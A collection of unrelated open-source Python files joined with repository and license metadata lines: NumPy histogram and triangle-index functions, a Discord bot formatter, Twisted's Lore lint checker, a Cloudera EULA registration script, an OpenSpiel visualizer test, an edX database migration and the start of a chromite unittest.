raise ValueError("x must be a one-dimensional array or sequence.")
if N is None:
N = len(x)
v = empty((len(x), N), dtype=promote_types(x.dtype, int))
tmp = v[:, ::-1] if not increasing else v
if N > 0:
tmp[:, 0] = 1
if N > 1:
tmp[:, 1:] = x[:, None]
multiply.accumulate(tmp[:, 1:], out=tmp[:, 1:], axis=1)
return v
def _histogram2d_dispatcher(x, y, bins=None, range=None, normed=None,
weights=None, density=None):
return (x, y, bins, weights)
@array_function_dispatch(_histogram2d_dispatcher)
def histogram2d(x, y, bins=10, range=None, normed=None, weights=None,
density=None):
"""
Compute the bi-dimensional histogram of two data samples.
Parameters
----------
x : array_like, shape (N,)
An array containing the x coordinates of the points to be
histogrammed.
y : array_like, shape (N,)
An array containing the y coordinates of the points to be
histogrammed.
bins : int or array_like or [int, int] or [array, array], optional
The bin specification:
* If int, the number of bins for the two dimensions (nx=ny=bins).
* If array_like, the bin edges for the two dimensions
(x_edges=y_edges=bins).
* If [int, int], the number of bins in each dimension
(nx, ny = bins).
* If [array, array], the bin edges in each dimension
(x_edges, y_edges = bins).
* A combination [int, array] or [array, int], where int
is the number of bins and array is the bin edges.
range : array_like, shape(2,2), optional
The leftmost and rightmost edges of the bins along each dimension
(if not specified explicitly in the `bins` parameters):
``[[xmin, xmax], [ymin, ymax]]``. All values outside of this range
will be considered outliers and not tallied in the histogram.
density : bool, optional
If False, the default, returns the number of samples in each bin.
If True, returns the probability *density* function at the bin,
``bin_count / sample_count / bin_area``.
normed : bool, optional
An alias for the density argument that behaves identically. To avoid
confusion with the broken normed argument to `histogram`, `density`
should be preferred.
weights : array_like, shape(N,), optional
An array of values ``w_i`` weighing each sample ``(x_i, y_i)``.
Weights are normalized to 1 if `normed` is True. If `normed` is
False, the values of the returned histogram are equal to the sum of
the weights belonging to the samples falling into each bin.
Returns
-------
H : ndarray, shape(nx, ny)
The bi-dimensional histogram of samples `x` and `y`. Values in `x`
are histogrammed along the first dimension and values in `y` are
histogrammed along the second dimension.
xedges : ndarray, shape(nx+1,)
The bin edges along the first dimension.
yedges : ndarray, shape(ny+1,)
The bin edges along the second dimension.
See Also
--------
histogram : 1D histogram
histogramdd : Multidimensional histogram
Notes
-----
When `normed` is True, then the returned histogram is the sample
density, defined such that the sum over bins of the product
``bin_value * bin_area`` is 1.
Please note that the histogram does not follow the Cartesian convention
where `x` values are on the abscissa and `y` values on the ordinate
axis. Rather, `x` is histogrammed along the first dimension of the
array (vertical), and `y` along the second dimension of the array
(horizontal). This ensures compatibility with `histogramdd`.
Examples
--------
>>> import matplotlib as mpl
>>> import matplotlib.pyplot as plt
Construct a 2-D histogram with variable bin width. First define the bin
edges:
>>> xedges = [0, 1, 3, 5]
>>> yedges = [0, 2, 3, 4, 6]
Next we create a histogram H with random bin content:
>>> x = np.random.normal(2, 1, 100)
>>> y = np.random.normal(1, 1, 100)
>>> H, xedges, yedges = np.histogram2d(x, y, bins=(xedges, yedges))
>>> H = H.T # Let each row list bins with common y range.
:func:`imshow <matplotlib.pyplot.imshow>` can only display square bins:
>>> fig = plt.figure(figsize=(7, 3))
>>> ax = fig.add_subplot(131, title='imshow: square bins')
>>> plt.imshow(H, interpolation='nearest', origin='low',
... extent=[xedges[0], xedges[-1], yedges[0], yedges[-1]])
:func:`pcolormesh <matplotlib.pyplot.pcolormesh>` can display actual edges:
>>> ax = fig.add_subplot(132, title='pcolormesh: actual edges',
... aspect='equal')
>>> X, Y = np.meshgrid(xedges, yedges)
>>> ax.pcolormesh(X, Y, H)
:class:`NonUniformImage <matplotlib.image.NonUniformImage>` can be used to
display actual bin edges with interpolation:
>>> ax = fig.add_subplot(133, title='NonUniformImage: interpolated',
... aspect='equal', xlim=xedges[[0, -1]], ylim=yedges[[0, -1]])
>>> im = mpl.image.NonUniformImage(ax, interpolation='bilinear')
>>> xcenters = (xedges[:-1] + xedges[1:]) / 2
>>> ycenters = (yedges[:-1] + yedges[1:]) / 2
>>> im.set_data(xcenters, ycenters, H)
>>> ax.images.append(im)
>>> plt.show()
"""
from numpy import histogramdd
try:
N = len(bins)
except TypeError:
N = 1
if N != 1 and N != 2:
xedges = yedges = asarray(bins)
bins = [xedges, yedges]
hist, edges = histogramdd([x, y], bins, range, normed, weights, density)
return hist, edges[0], edges[1]
def mask_indices(n, mask_func, k=0):
"""
Return the indices to access (n, n) arrays, given a masking function.
Assume `mask_func` is a function that, for a square array a of size
``(n, n)`` with a possible offset argument `k`, when called as
``mask_func(a, k)`` returns a new array with zeros in certain locations
(functions like `triu` or `tril` do precisely this). Then this function
returns the indices where the non-zero values would be located.
Parameters
----------
n : int
The returned indices will be valid to access arrays of shape (n, n).
mask_func : callable
A function whose call signature is similar to that of `triu`, `tril`.
That is, ``mask_func(x, k)`` returns a boolean array, shaped like `x`.
`k` is an optional argument to the function.
k : scalar
An optional argument which is passed through to `mask_func`. Functions
like `triu`, `tril` take a second argument that is interpreted as an
offset.
Returns
-------
indices : tuple of arrays.
The `n` arrays of indices corresponding to the locations where
``mask_func(np.ones((n, n)), k)`` is True.
See Also
--------
triu, tril, triu_indices, tril_indices
Notes
-----
.. versionadded:: 1.4.0
Examples
--------
These are the indices that would allow you to access the upper triangular
part of any 3x3 array:
>>> iu = np.mask_indices(3, np.triu)
For example, if `a` is a 3x3 array:
>>> a = np.arange(9).reshape(3, 3)
>>> a
array([[0, 1, 2],
[3, 4, 5],
[6, 7, 8]])
>>> a[iu]
array([0, 1, 2, 4, 5, 8])
An offset can be passed also to the masking function. This gets us the
indices starting on the first diagonal right of the main one:
>>> iu1 = np.mask_indices(3, np.triu, 1)
with which we now extract only three elements:
>>> a[iu1]
array([1, 2, 5])
"""
m = ones((n, n), int)
a = mask_func(m, k)
return nonzero(a != 0)
def tril_indices(n, k=0, m=None):
"""
Return the indices for the lower-triangle of an (n, m) array.
Parameters
----------
n : int
The row dimension of the arrays for which the returned
indices will be valid.
k : int, optional
Diagonal offset (see `tril` for details).
m : int, optional
.. versionadded:: 1.9.0
The column dimension of the arrays for which the returned
arrays will be valid.
By default `m` is taken equal to `n`.
Returns
-------
inds : tuple of arrays
The indices for the triangle. The returned tuple contains two arrays,
each with the indices along one dimension of the array.
See also
--------
triu_indices : similar function, for upper-triangular.
mask_indices : generic function accepting an arbitrary mask function.
tril, triu
Notes
-----
.. versionadded:: 1.4.0
Examples
--------
Compute two different sets of indices to access 4x4 arrays, one for the
lower triangular part starting at the main diagonal, and one starting two
diagonals further right:
>>> il1 = np.tril_indices(4)
>>> il2 = np.tril_indices(4, 2)
Here is how they can be used with a sample array:
>>> a = np.arange(16).reshape(4, 4)
>>> a
array([[ 0, 1, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11],
[12, 13, 14, 15]])
Both for indexing:
>>> a[il1]
array([ 0, 4, 5, 8, 9, 10, 12, 13, 14, 15])
And for assigning values:
>>> a[il1] = -1
>>> a
array([[-1, 1, 2, 3],
[-1, -1, 6, 7],
[-1, -1, -1, 11],
[-1, -1, -1, -1]])
These cover almost the whole array (two diagonals right of the main one):
>>> a[il2] = -10
>>> a
array([[-10, -10, -10, 3],
[-10, -10, -10, -10],
[-10, -10, -10, -10],
[-10, -10, -10, -10]])
"""
return nonzero(tri(n, m, k=k, dtype=bool))
def _trilu_indices_form_dispatcher(arr, k=None):
return (arr,)
@array_function_dispatch(_trilu_indices_form_dispatcher)
def tril_indices_from(arr, k=0):
"""
Return the indices for the lower-triangle of arr.
See `tril_indices` for full details.
Parameters
----------
arr : array_like
The indices will be valid for square arrays whose dimensions are
the same as arr.
k : int, optional
Diagonal offset (see `tril` for details).
See Also
--------
tril_indices, tril
Notes
-----
.. versionadded:: 1.4.0
"""
if arr.ndim != 2:
raise ValueError("input array must be 2-d")
return tril_indices(arr.shape[-2], k=k, m=arr.shape[-1])
def triu_indices(n, k=0, m=None):
"""
Return the indices for the upper-triangle of an (n, m) array.
Parameters
----------
n : int
The size of the arrays for which the returned indices will
be valid.
k : int, optional
Diagonal offset (see `triu` for details).
m : int, optional
.. versionadded:: 1.9.0
The column dimension of the arrays for which the returned
arrays will be valid.
By default `m` is taken equal to `n`.
Returns
-------
inds : tuple, shape(2) of ndarrays, shape(`n`)
The indices for the triangle. The returned tuple contains two arrays,
each with the indices along one dimension of the array. Can be used
to slice a ndarray of shape(`n`, `n`).
See also
--------
tril_indices : similar function, for lower-triangular.
mask_indices : generic function accepting an arbitrary mask function.
triu, tril
Notes
-----
.. versionadded:: 1.4.0
Examples
--------
Compute two different sets of indices to access 4x4 arrays, one for the
upper triangular part starting at the main diagonal, and one starting two
diagonals further right:
>>> iu1 = np.triu_indices(4)
>>> iu2 = np.triu_indices(4, 2)
Here is how they can be used with a sample array:
>>> a = np.arange(16).reshape(4, 4)
>>> a
array([[ 0, 1, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11],
[12, 13, 14, 15]])
Both for indexing:
>>> a[iu1]
array([ 0, 1, 2, 3, 5, 6, 7, 10, 11, 15])
And for assigning values:
>>> a[iu1] = -1
>>> a
array([[-1, -1, -1, -1],
[ 4, -1, -1, -1],
[ 8, 9, -1, -1],
[12, 13, 14, -1]])
These cover only a small part of the whole array (two diagonals right
of the main one):
>>> a[iu2] = -10
>>> a
array([[ -1, -1, -10, -10],
[ 4, -1, -1, -10],
[ 8, 9, -1, -1],
[ 12, 13, 14, -1]])
"""
return nonzero(~tri(n, m, k=k-1, dtype=bool))
@array_function_dispatch(_trilu_indices_form_dispatcher)
def triu_indices_from(arr, k=0):
"""
Return the indices for the upper-triangle of arr.
See `triu_indices` for full details.
Parameters
----------
arr : ndarray, shape(N, N)
The indices will be valid for square arrays.
k : int, optional
Diagonal offset (see `triu` for details).
Returns
-------
triu_indices_from : tuple, shape(2) of ndarray, shape(N)
Indices for the upper-triangle of `arr`.
See Also
--------
triu_indices, triu
Notes
-----
.. versionadded:: 1.4.0
"""
if arr.ndim != 2:
raise ValueError("input array must be 2-d")
return triu_indices(arr.shape[-2], k=k, m=arr.shape[-1])
|
bsd-3-clause
|
sedruk/Red-DiscordBot
|
cogs/utils/formats.py
|
2
|
2642
|
# Manually imported from:
# https://github.com/Rapptz/RoboDanny/blob/master/cogs/utils/formats.py
# DATE IMPORTED: 2014-04-10
async def entry_to_code(bot, entries):
width = max(map(lambda t: len(t[0]), entries))
output = ['```']
fmt = '{0:<{width}}: {1}'
for name, entry in entries:
output.append(fmt.format(name, entry, width=width))
output.append('```')
await bot.say('\n'.join(output))
import datetime
async def indented_entry_to_code(bot, entries):
width = max(map(lambda t: len(t[0]), entries))
output = ['```']
fmt = '\u200b{0:>{width}}: {1}'
for name, entry in entries:
output.append(fmt.format(name, entry, width=width))
output.append('```')
await bot.say('\n'.join(output))
async def too_many_matches(bot, msg, matches, entry):
check = lambda m: m.content.isdigit()
await bot.say('There are too many matches... Which one did you mean? **Only say the number**.')
await bot.say('\n'.join(map(entry, enumerate(matches, 1))))
# only give them 3 tries.
for i in range(3):
message = await bot.wait_for_message(author=msg.author, channel=msg.channel, check=check)
index = int(message.content)
try:
return matches[index - 1]
except:
await bot.say('Please give me a valid number. {} tries remaining...'.format(2 - i))
raise ValueError('Too many tries. Goodbye.')
class Plural:
def __init__(self, **attr):
iterator = attr.items()
self.name, self.value = next(iter(iterator))
def __str__(self):
v = self.value
if v > 1:
return '%s %ss' % (v, self.name)
return '%s %s' % (v, self.name)
def human_timedelta(dt):
now = datetime.datetime.utcnow()
delta = now - dt
hours, remainder = divmod(int(delta.total_seconds()), 3600)
minutes, seconds = divmod(remainder, 60)
days, hours = divmod(hours, 24)
years, days = divmod(days, 365)
if years:
if days:
return '%s and %s ago' % (Plural(year=years), Plural(day=days))
return '%s ago' % Plural(year=years)
if days:
if hours:
return '%s and %s ago' % (Plural(day=days), Plural(hour=hours))
return '%s ago' % Plural(day=days)
if hours:
if minutes:
return '%s and %s ago' % (Plural(hour=hours), Plural(minute=minutes))
return '%s ago' % Plural(hour=hours)
if minutes:
if seconds:
return '%s and %s ago' % (Plural(minute=minutes), Plural(second=seconds))
return '%s ago' % Plural(minute=minutes)
return '%s ago' % Plural(second=seconds)
|
gpl-3.0
|
hendradarwin/VTK
|
ThirdParty/Twisted/twisted/lore/lint.py
|
32
|
8849
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Checker for common errors in Lore documents.
"""
from xml.dom import minidom as dom
import parser
import urlparse
import os.path
from twisted.lore import tree, process
from twisted.web import domhelpers
from twisted.python import reflect
from twisted.python.versions import Version
from twisted.python.deprecate import deprecatedModuleAttribute
parserErrors = (SyntaxError,)
deprecatedModuleAttribute(
Version("Twisted", 13, 1, 0),
"parserErrors is deprecated",
__name__,
"parserErrors")
class TagChecker:
def check(self, dom, filename):
self.hadErrors = 0
for method in reflect.prefixedMethods(self, 'check_'):
method(dom, filename)
if self.hadErrors:
raise process.ProcessingFailure("invalid format")
def _reportError(self, filename, element, error):
hlint = element.hasAttribute('hlint') and element.getAttribute('hlint')
if hlint != 'off':
self.hadErrors = 1
pos = getattr(element, '_markpos', None) or (0, 0)
print "%s:%s:%s: %s" % ((filename,)+pos+(error,))
class DefaultTagChecker(TagChecker):
def __init__(self, allowedTags, allowedClasses):
self.allowedTags = allowedTags
self.allowedClasses = allowedClasses
def check_disallowedElements(self, dom, filename):
def m(node, self=self):
return not self.allowedTags(node.tagName)
for element in domhelpers.findElements(dom, m):
self._reportError(filename, element,
'unrecommended tag %s' % element.tagName)
def check_disallowedClasses(self, dom, filename):
def matcher(element, self=self):
if not element.hasAttribute('class'):
return 0
checker = self.allowedClasses.get(element.tagName, lambda x:0)
return not checker(element.getAttribute('class'))
for element in domhelpers.findElements(dom, matcher):
self._reportError(filename, element,
'unknown class %s' %element.getAttribute('class'))
def check_quote(self, doc, filename):
def matcher(node):
return ('"' in getattr(node, 'data', '') and
not isinstance(node, dom.Comment) and
not [1 for n in domhelpers.getParents(node)[1:-1]
if n.tagName in ('pre', 'code')])
for node in domhelpers.findNodes(doc, matcher):
self._reportError(filename, node.parentNode, 'contains quote')
def check_styleattr(self, dom, filename):
for node in domhelpers.findElementsWithAttribute(dom, 'style'):
self._reportError(filename, node, 'explicit style')
def check_align(self, dom, filename):
for node in domhelpers.findElementsWithAttribute(dom, 'align'):
self._reportError(filename, node, 'explicit alignment')
def check_style(self, dom, filename):
for node in domhelpers.findNodesNamed(dom, 'style'):
if domhelpers.getNodeText(node) != '':
self._reportError(filename, node, 'hand hacked style')
def check_title(self, dom, filename):
doc = dom.documentElement
title = domhelpers.findNodesNamed(dom, 'title')
if len(title)!=1:
return self._reportError(filename, doc, 'not exactly one title')
h1 = domhelpers.findNodesNamed(dom, 'h1')
if len(h1)!=1:
return self._reportError(filename, doc, 'not exactly one h1')
if domhelpers.getNodeText(h1[0]) != domhelpers.getNodeText(title[0]):
self._reportError(filename, h1[0], 'title and h1 text differ')
def check_80_columns(self, dom, filename):
for node in domhelpers.findNodesNamed(dom, 'pre'):
# the ps/pdf output is in a font that cuts off at 80 characters,
# so this is enforced to make sure the interesting parts (which
# are likely to be on the right-hand edge) stay on the printed
# page.
for line in domhelpers.gatherTextNodes(node, 1).split('\n'):
if len(line.rstrip()) > 80:
self._reportError(filename, node,
'text wider than 80 columns in pre')
for node in domhelpers.findNodesNamed(dom, 'a'):
if node.getAttribute('class').endswith('listing'):
try:
fn = os.path.dirname(filename)
fn = os.path.join(fn, node.getAttribute('href'))
lines = open(fn,'r').readlines()
except:
self._reportError(filename, node,
'bad listing href: %r' %
node.getAttribute('href'))
continue
for line in lines:
if len(line.rstrip()) > 80:
self._reportError(filename, node,
'listing wider than 80 columns')
def check_pre_py_listing(self, dom, filename):
for node in domhelpers.findNodesNamed(dom, 'pre'):
if node.getAttribute('class') == 'python':
try:
text = domhelpers.getNodeText(node)
# Fix < and >
text = text.replace('>', '>').replace('<', '<')
# Strip blank lines
lines = filter(None,[l.rstrip() for l in text.split('\n')])
# Strip leading space
while not [1 for line in lines if line[:1] not in ('',' ')]:
lines = [line[1:] for line in lines]
text = '\n'.join(lines) + '\n'
try:
parser.suite(text)
except SyntaxError:
# Pretend the "..." idiom is syntactically valid
text = text.replace("...","'...'")
parser.suite(text)
except SyntaxError as e:
self._reportError(filename, node,
'invalid python code:' + str(e))
def check_anchor_in_heading(self, dom, filename):
headingNames = ['h%d' % n for n in range(1,7)]
for hname in headingNames:
for node in domhelpers.findNodesNamed(dom, hname):
if domhelpers.findNodesNamed(node, 'a'):
self._reportError(filename, node, 'anchor in heading')
def check_texturl_matches_href(self, dom, filename):
for node in domhelpers.findNodesNamed(dom, 'a'):
if not node.hasAttribute('href'):
continue
text = domhelpers.getNodeText(node)
proto = urlparse.urlparse(text)[0]
if proto and ' ' not in text:
if text != node.getAttribute('href'):
self._reportError(filename, node,
'link text does not match href')
def check_lists(self, dom, filename):
for node in (domhelpers.findNodesNamed(dom, 'ul')+
domhelpers.findNodesNamed(dom, 'ol')):
if not node.childNodes:
self._reportError(filename, node, 'empty list')
for child in node.childNodes:
if child.nodeName != 'li':
self._reportError(filename, node,
'only list items allowed in lists')
def list2dict(l):
d = {}
for el in l:
d[el] = None
return d
classes = list2dict(['shell', 'API', 'python', 'py-prototype', 'py-filename',
'py-src-string', 'py-signature', 'py-src-parameter',
'py-src-identifier', 'py-src-keyword'])
tags = list2dict(["html", "title", "head", "body", "h1", "h2", "h3", "ol", "ul",
"dl", "li", "dt", "dd", "p", "code", "img", "blockquote", "a",
"cite", "div", "span", "strong", "em", "pre", "q", "table",
"tr", "td", "th", "style", "sub", "sup", "link"])
span = list2dict(['footnote', 'manhole-output', 'index'])
div = list2dict(['note', 'boxed', 'doit'])
a = list2dict(['listing', 'py-listing', 'html-listing', 'absolute'])
pre = list2dict(['python', 'shell', 'python-interpreter', 'elisp'])
allowed = {'code': classes.has_key, 'span': span.has_key, 'div': div.has_key,
'a': a.has_key, 'pre': pre.has_key, 'ul': lambda x: x=='toc',
'ol': lambda x: x=='toc', 'li': lambda x: x=='ignoretoc'}
def getDefaultChecker():
return DefaultTagChecker(tags.__contains__, allowed)
def doFile(file, checker):
doc = tree.parseFileAndReport(file)
if doc:
checker.check(doc, file)
|
bsd-3-clause
|
anhowe/azure-quickstart-templates
|
cloudera-director-on-centos/scripts/marketing.py
|
103
|
3151
|
#! /usr/bin/env python
# Copyright (c) 2016 Cloudera, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Simple script that shows how to use the Cloudera Director API to initialize
# the environment and instance templates
import urllib
import urllib2
from optparse import OptionParser
import sys
import logging
#loging starts
logging.basicConfig(filename='/var/log/marketing.log', level=logging.DEBUG)
def parse_options():
parser = OptionParser()
parser.add_option('-e', '--email-address', dest='email', type="string", help='Set email address')
parser.add_option('-b', '--business-phone', dest='phone', type="string", help='Set phone')
parser.add_option('-f', '--first-name', dest='fname', type="string", help='Set first name')
parser.add_option('-l', '--last-name', dest='lname', type="string", help='Set last name')
parser.add_option('-r', '--job-role', dest='jobrole', type="string", help='Set job role')
parser.add_option('-j', '--job-function', dest='jobfunction', type="string", help='Set job function')
parser.add_option('-c', '--company', dest='company', type="string", help='Set company')
(options, args) = parser.parse_args()
if (options.email is None or options.phone is None or options.fname is None or options.lname is None or
options.jobrole is None or options.jobfunction is None or options.company is None):
logging.error("required parameter cannot be empty")
sys.exit(1)
return options
def postEulaInfo(firstName, lastName, emailAddress, company,jobRole, jobFunction, businessPhone):
elqFormName='Cloudera_Director_on_Azure_EULA'
elqSiteID='1465054361'
cid='701340000018RQV'
url = 'https://s1465054361.t.eloqua.com/e/f2'
data = urllib.urlencode({'elqFormName': elqFormName,
'elqSiteID': elqSiteID,
'cid': cid,
'firstName': firstName,
'lastName': lastName,
'company': company,
'emailAddress': emailAddress,
'jobRole': jobRole,
'jobFunction': jobFunction,
'businessPhone': businessPhone
})
results = urllib2.urlopen(url, data)
logging.info(results.read())
def main():
# Parse user options
logging.info("parse_options")
options = parse_options()
postEulaInfo(options.fname, options.lname, options.email, options.company, options.jobrole, options.jobfunction,
options.phone)
if __name__ == "__main__":
main()
|
mit
|
deepmind/open_spiel
|
open_spiel/python/egt/alpharank_visualizer_test.py
|
1
|
2447
|
# Copyright 2019 DeepMind Technologies Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for open_spiel.python.egt.alpharank_visualizer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
# pylint: disable=g-import-not-at-top
import matplotlib
matplotlib.use("agg") # switch backend for testing
import mock
import numpy as np
from open_spiel.python.egt import alpharank
from open_spiel.python.egt import alpharank_visualizer
from open_spiel.python.egt import utils
import pyspiel
class AlpharankVisualizerTest(absltest.TestCase):
@mock.patch("%s.alpharank_visualizer.plt" % __name__)
def test_plot_pi_vs_alpha(self, mock_plt):
# Construct game
game = pyspiel.load_matrix_game("matrix_rps")
payoff_tables = utils.game_payoffs_array(game)
_, payoff_tables = utils.is_symmetric_matrix_game(payoff_tables)
payoffs_are_hpt_format = utils.check_payoffs_are_hpt(payoff_tables)
# Compute alpharank
alpha = 1e2
_, _, pi, num_profiles, num_strats_per_population =\
alpharank.compute(payoff_tables, alpha=alpha)
strat_labels = utils.get_strat_profile_labels(payoff_tables,
payoffs_are_hpt_format)
num_populations = len(payoff_tables)
# Construct synthetic pi-vs-alpha history
pi_list = np.empty((num_profiles, 0))
alpha_list = []
for _ in range(2):
pi_list = np.append(pi_list, np.reshape(pi, (-1, 1)), axis=1)
alpha_list.append(alpha)
# Test plotting code (via pyplot mocking to prevent plot pop-up)
alpharank_visualizer.plot_pi_vs_alpha(
pi_list.T,
alpha_list,
num_populations,
num_strats_per_population,
strat_labels,
num_strats_to_label=0)
self.assertTrue(mock_plt.show.called)
if __name__ == "__main__":
absltest.main()
|
apache-2.0
|
vismartltd/edx-platform
|
lms/djangoapps/ccx/migrations/0001_initial.py
|
94
|
8576
|
# -*- coding: utf-8 -*-
# pylint: disable=invalid-name, missing-docstring, unused-argument, unused-import, line-too-long
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'CustomCourseForEdX'
db.create_table('ccx_customcourseforedx', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('course_id', self.gf('xmodule_django.models.CourseKeyField')(max_length=255, db_index=True)),
('display_name', self.gf('django.db.models.fields.CharField')(max_length=255)),
('coach', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
))
db.send_create_signal('ccx', ['CustomCourseForEdX'])
# Adding model 'CcxMembership'
db.create_table('ccx_ccxmembership', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('ccx', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['ccx.CustomCourseForEdX'])),
('student', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
('active', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal('ccx', ['CcxMembership'])
# Adding model 'CcxFutureMembership'
db.create_table('ccx_ccxfuturemembership', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('ccx', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['ccx.CustomCourseForEdX'])),
('email', self.gf('django.db.models.fields.CharField')(max_length=255)),
('auto_enroll', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal('ccx', ['CcxFutureMembership'])
# Adding model 'CcxFieldOverride'
db.create_table('ccx_ccxfieldoverride', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('ccx', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['ccx.CustomCourseForEdX'])),
('location', self.gf('xmodule_django.models.LocationKeyField')(max_length=255, db_index=True)),
('field', self.gf('django.db.models.fields.CharField')(max_length=255)),
('value', self.gf('django.db.models.fields.TextField')(default='null')),
))
db.send_create_signal('ccx', ['CcxFieldOverride'])
# Adding unique constraint on 'CcxFieldOverride', fields ['ccx', 'location', 'field']
db.create_unique('ccx_ccxfieldoverride', ['ccx_id', 'location', 'field'])
def backwards(self, orm):
# Removing unique constraint on 'CcxFieldOverride', fields ['ccx', 'location', 'field']
db.delete_unique('ccx_ccxfieldoverride', ['ccx_id', 'location', 'field'])
# Deleting model 'CustomCourseForEdX'
db.delete_table('ccx_customcourseforedx')
# Deleting model 'CcxMembership'
db.delete_table('ccx_ccxmembership')
# Deleting model 'CcxFutureMembership'
db.delete_table('ccx_ccxfuturemembership')
# Deleting model 'CcxFieldOverride'
db.delete_table('ccx_ccxfieldoverride')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'ccx.ccxfieldoverride': {
'Meta': {'unique_together': "(('ccx', 'location', 'field'),)", 'object_name': 'CcxFieldOverride'},
'ccx': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ccx.CustomCourseForEdX']"}),
'field': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('xmodule_django.models.LocationKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'value': ('django.db.models.fields.TextField', [], {'default': "'null'"})
},
'ccx.ccxfuturemembership': {
'Meta': {'object_name': 'CcxFutureMembership'},
'auto_enroll': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'ccx': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ccx.CustomCourseForEdX']"}),
'email': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'ccx.ccxmembership': {
'Meta': {'object_name': 'CcxMembership'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'ccx': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ccx.CustomCourseForEdX']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'student': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'ccx.customcourseforedx': {
'Meta': {'object_name': 'CustomCourseForEdX'},
'coach': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['ccx']
|
agpl-3.0
|
chadversary/chromiumos.chromite
|
lib/partial_mock_unittest.py
|
2
|
7884
|
#!/usr/bin/python
# Copyright (c) 2012 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unittests for the partial_mock test helper code."""
import os
